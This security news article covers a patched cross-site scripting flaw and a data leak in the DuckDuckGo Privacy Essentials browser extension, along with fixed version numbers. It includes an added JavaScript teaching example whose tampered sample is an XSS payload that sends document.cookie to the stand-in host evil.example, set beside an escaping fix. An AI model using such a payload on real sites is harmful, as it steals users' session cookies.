The privacy-focused service DuckDuckGo has recently addressed a serious vulnerability in its browser extension, DuckDuckGo Privacy Essentials. Exploiting it could allow an adversary to run arbitrary code in the context of any website the user visits.
DuckDuckGo Browser Extension Vulnerability
Security researcher Wladimir Palant found serious security issues affecting the DuckDuckGo browser add-on.
Explaining the details in his post, Palant mentioned two distinct issues with the extension DuckDuckGo Privacy Essentials.
The first is a cross-site scripting (XSS) vulnerability affecting the extension on all major browsers. Anyone with control over http://staticcdn.duckduckgo.com, the host the extension fetches data from, could exploit the flaw. That includes DuckDuckGo itself, its hosting provider (Microsoft), and any attacker who manages to compromise the server. Note that the trust boundary here is the host, not the network: a resource served from the expected origin is still attacker-controlled if the origin is.
Second, he found that the extension used an insecure channel for its internal communication, which leaked some data across domains.
Technical details about these issues are available in the researcher’s post.
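The XSS above is an instance of a general extension bug: data fetched from a host the extension trusts reaches an HTML sink unescaped, and because content scripts run on every site the payload runs on every site. The following is an added illustration of that class, not code from Palant's post or from the DuckDuckGo extension. The `label` field, the `renderLabel*` functions, the 128-character budget and the `evil.example` host are hypothetical; the page does not say which resource or sink the real extension used.

```javascript
// Added illustration, not DuckDuckGo's code. The remote "label" field, the
// renderLabel* functions and the evil.example host are all hypothetical.

// Constructed sample: a benign CDN response as the extension would expect it.
const benignResponse = JSON.stringify({ label: "Tracker-free" });

// Constructed sample: the same resource after someone with control of the CDN
// edits it. Nothing about the fetch (same host, same path, valid JSON) reveals
// the change, so the extension cannot tell the two apart by origin alone.
const tamperedResponse = JSON.stringify({
  label: '<img src=x onerror="fetch(\'https://evil.example/?c=\' + document.cookie)">',
});

// Vulnerable pattern: the remote string goes straight into markup that a
// content script would assign to element.innerHTML on the visited page.
function renderLabelUnsafe(body) {
  const { label } = JSON.parse(body);
  return `<div class="ddg-label">${label}</div>`;
}

// Minimal HTML escaping for text placed inside an element's content.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Hardened pattern: check the payload's shape, bound its size, and escape
// before it touches markup. In a real content script, prefer setting
// element.textContent over building HTML strings from remote data at all.
function renderLabelSafe(body) {
  const data = JSON.parse(body);
  if (data === null || typeof data !== "object" || typeof data.label !== "string") {
    throw new TypeError("CDN payload has unexpected shape");
  }
  if (data.label.length > 128) {
    throw new RangeError("CDN label exceeds hypothetical size budget");
  }
  return `<div class="ddg-label">${escapeHtml(data.label)}</div>`;
}

// True if the rendered markup still contains a tag that came from the CDN,
// i.e. if a remote string could reach the page as live HTML.
function containsLiveTag(html) {
  const inner = html
    .replace(/^<div class="ddg-label">/, "")
    .replace(/<\/div>$/, "");
  return inner.includes("<");
}

// Stand-alone run: compare both renderers on the tampered response.
console.log("unsafe leaks tag:", containsLiveTag(renderLabelUnsafe(tamperedResponse)));
console.log("safe leaks tag:  ", containsLiveTag(renderLabelSafe(tamperedResponse)));
```

The hardened function still returns markup so that both outputs can be compared on one string; in an extension the stronger fix is to never build HTML from remote data and to pin what a CDN may deliver (a fixed schema, no executable content), since the host itself is the thing an attacker gets to control.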
Patches Now Available
Upon discovering the vulnerabilities, the researcher reported the matter to DuckDuckGo.
Consequently, the service developed fixes for both issues and began rolling the updates out gradually.
DuckDuckGo first released Privacy Essentials version 2021.2.3 for Google Chrome. Patched builds for Mozilla Firefox and Microsoft Edge followed.
Users running the latest version of DuckDuckGo Privacy Essentials (2021.3.8) should therefore be protected from these bugs. Anyone still on an older version should update the extension; the installed version is shown on the browser's extensions page (chrome://extensions, about:addons in Firefox, edge://extensions), which is the quickest way to confirm the update has actually landed.
DuckDuckGo Privacy Essentials is a browser extension available for all major browsers, including Mozilla Firefox, Google Chrome and Microsoft Edge. It is open source, blocks web trackers while browsing, upgrades connections to HTTPS where the site supports it, and does so without collecting user data on its end.